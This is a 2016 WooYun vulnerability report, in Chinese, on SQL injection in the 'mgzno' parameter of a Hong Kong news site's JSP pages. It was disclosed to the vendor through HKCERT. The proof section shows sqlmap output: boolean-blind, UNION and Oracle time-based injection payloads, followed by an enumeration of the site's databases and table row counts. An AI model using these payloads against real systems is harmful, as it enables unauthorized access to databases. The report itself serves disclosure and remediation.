当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0168656

漏洞标题:中國評論新聞多枚SQL注入打包#可影响同服多个网站(香港地區)

相关厂商:中评网

漏洞作者: Ghost丶与狼共舞

提交时间:2016-01-11 13:35

修复时间:2016-02-27 11:49

公开时间:2016-02-27 11:49

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-11: 细节已通知厂商并且等待厂商处理中
2016-01-14: 厂商已经确认,细节仅向厂商公开
2016-01-24: 细节向核心白帽子及相关领域专家公开
2016-02-03: 细节向普通白帽子公开
2016-02-13: 细节向实习白帽子公开
2016-02-27: 细节向公众公开

简要描述:

中國評論新聞多枚SQL注入打包#可影响同服多个网站

详细说明:

http://**.**.**.**/crn-webapp/zpykpub/left.jsp?mgzno=214 --这个不不用延迟注入
**.**.**.**/crn-webapp/zpykpub/index.jsp?mgzno=213

漏洞证明:

---
Place: GET
Parameter: mgzno
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: mgzno=214 AND 1839=1839
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: mgzno=-5247 UNION ALL SELECT NULL,NULL,NULL,NULL,CHR(113)||CHR(119)||CHR(118)||CHR(118)||CHR(113)||CHR(104)||CHR(121)||CHR(114)||CHR(78)||CHR(111)||CHR(87)||CHR(89)||CHR(67)||CHR(90)||CHR(74)||CHR(113)||CHR(99)||CHR(110)||CHR(100)||CHR(113),NULL FROM DUAL--
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: mgzno=214 AND 2650=DBMS_PIPE.RECEIVE_MESSAGE(CHR(112)||CHR(77)||CHR(72)||CHR(78),5)
---
web server operating system: Windows
web application technology: Apache 2.0.64
back-end DBMS: Oracle
available databases [22]:
[*] APEX_040200
[*] APPQOSSYS
[*] AUDSYS
[*] CTXSYS
[*] DBSNMP
[*] DVSYS
[*] FLOWS_FILES
[*] GSMADMIN_INTERNAL
[*] JTCB
[*] JTSITE
[*] LBACSYS
[*] MDSYS
[*] OJVMSYS
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SYS
[*] SYSTEM
[*] WMSYS
[*] XDB
web server operating system: Windows
web application technology: Apache 2.0.64
back-end DBMS: Oracle
Database: JTSITE
+--------------------+---------+
| Table | Entries |
+--------------------+---------+
| TMP_CBSIGNBOARD | 2273417 |
| CBSIGNBOARD23 | 776624 |
| CBSIGNBOARD11 | 741756 |
| CBSIGNBOARD | 610820 |
| CBLOG | 466205 |
| CBRELWORDS | 398572 |
| CBSIGNBOARD10 | 333111 |
| CBSIGNBOARD18 | 147044 |
| CBSIGNBOARD12 | 138872 |
| CBSIGNBOARD20 | 132507 |
| CBSIGNBOARD14 | 123965 |
| CBSIGNBOARD17 | 119776 |
| CBSIGNBOARD15 | 113607 |
| CBSIGNBOARD22 | 112645 |
| BAK_CBRELWORDS | 109972 |
| CBSIGNBOARD13 | 101443 |
| CBCOLUBOARD | 87352 |
| YKSIGNBOARD10 | 61286 |
| CBSIGNBOARD19 | 60300 |
| CBVOTELOG | 54164 |
| YKRELWORDS | 51188 |
| CBSIGNBOARD16 | 46340 |
| CBMAINBOARD | 38591 |
| CBSIGNBOARD21 | 26266 |
| YKSIGNBOARD11 | 12220 |
| YKSIGNBOARD12 | 11967 |
| CBMAINBOARDBAK | 9758 |
| CBHITCOUNTER | 1656 |
| YKUSERINFO | 1334 |
| CBREVIEW | 932 |
| YKMAINBOARD | 730 |
| YKCOLUBOARD | 701 |
| CBREVIEWRUBBISH | 438 |
| TB_COLUBOARD | 428 |
| CBCOLUBOARD_TAIWAN | 320 |
| CBADV | 264 |
| CBVOTE | 253 |
| CBSIGNBOARDBAK | 152 |
| CBDOCUMENTEXP | 88 |
| CBRESEARCH | 77 |
| PIC_CBLOG | 56 |
| CBCARD | 25 |
| CBKIND | 25 |
| PIC_CBCOLUBOARD | 18 |
| PIC_CBMAINBOARD | 18 |
| PIC_CBSIGNBOARD | 18 |
| CBJIESHAO | 11 |
| CBUSERINFO | 6 |
| CBRSSNEWS | 5 |
| PIC_CBPIC_2 | 5 |
| PIC_CBSIGNBOARD_0 | 5 |
| PIC_CBSIGNBOARD_6 | 5 |
| CBCOLUMN | 4 |
| PIC_CBPIC_1 | 3 |
| PIC_CBPIC_7 | 3 |
| PIC_CBATTACH | 2 |
| PIC_CBSIGNBOARD_1 | 2 |
| PIC_CBSIGNBOARD_2 | 2 |
| PIC_CBSIGNBOARD_5 | 2 |
| CBSTATUS | 1 |
| PIC_CBPIC_0 | 1 |
| PIC_CBPIC_3 | 1 |
| PIC_CBPIC_8 | 1 |
| PIC_CBPIC_9 | 1 |
| PIC_CBSIGNBOARD_3 | 1 |
| PIC_CBSIGNBOARD_4 | 1 |
+--------------------+---------+
Database: JTCB
+--------------------------------+---------+
| Table | Entries |
+--------------------------------+---------+
| CBPIC | 1197039 |
| CBQUERYSIGN | 999008 |
| CBSCRIPTLOG | 925407 |
| CBSIGN | 920692 |
| CBROUTE | 345886 |
| CBDOCBAK | 265830 |
| CBLOG_TRASH | 83399 |
| CBSIGN01 | 78316 |
| CBPICBAK | 43880 |
| CBDOCUMENT | 42784 |
| YKPIC | 37981 |
| YKSIGN | 30213 |
| YKSCRIPTLOG | 30212 |
| CBLOG | 27757 |
| YKROUTE | 21248 |
| CBTRASH | 19350 |
| YKDOCBAK | 17565 |
| CB_CBS_SECTION | 16164 |
| TB_YKPIC | 11082 |
| CBGLCRC | 7082 |
| DBSYNCCBSCRIPTLOG | 4882 |
| CBCANCEL | 4668 |
| CBCONTRIBUTE | 3996 |
| CBKIND | 3397 |
| CB_CBS_CHAPTER | 2536 |
| CB_ZPYK_DOCUMENT | 2495 |
| CB_CBS_PIC | 2098 |
| CB_ZPYK_COLUMN | 2007 |
| CBCOMMENT | 1919 |
| CB_CBS_CATALOG | 1694 |
| CB_CBS_DOCUMENT | 1402 |
| CBDOCZPYK | 956 |

修复方案:

参数过滤

版权声明:转载请注明来源 Ghost丶与狼共舞@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-01-14 16:24

厂商回复:

已將事件通知有關機構

最新状态:

暂无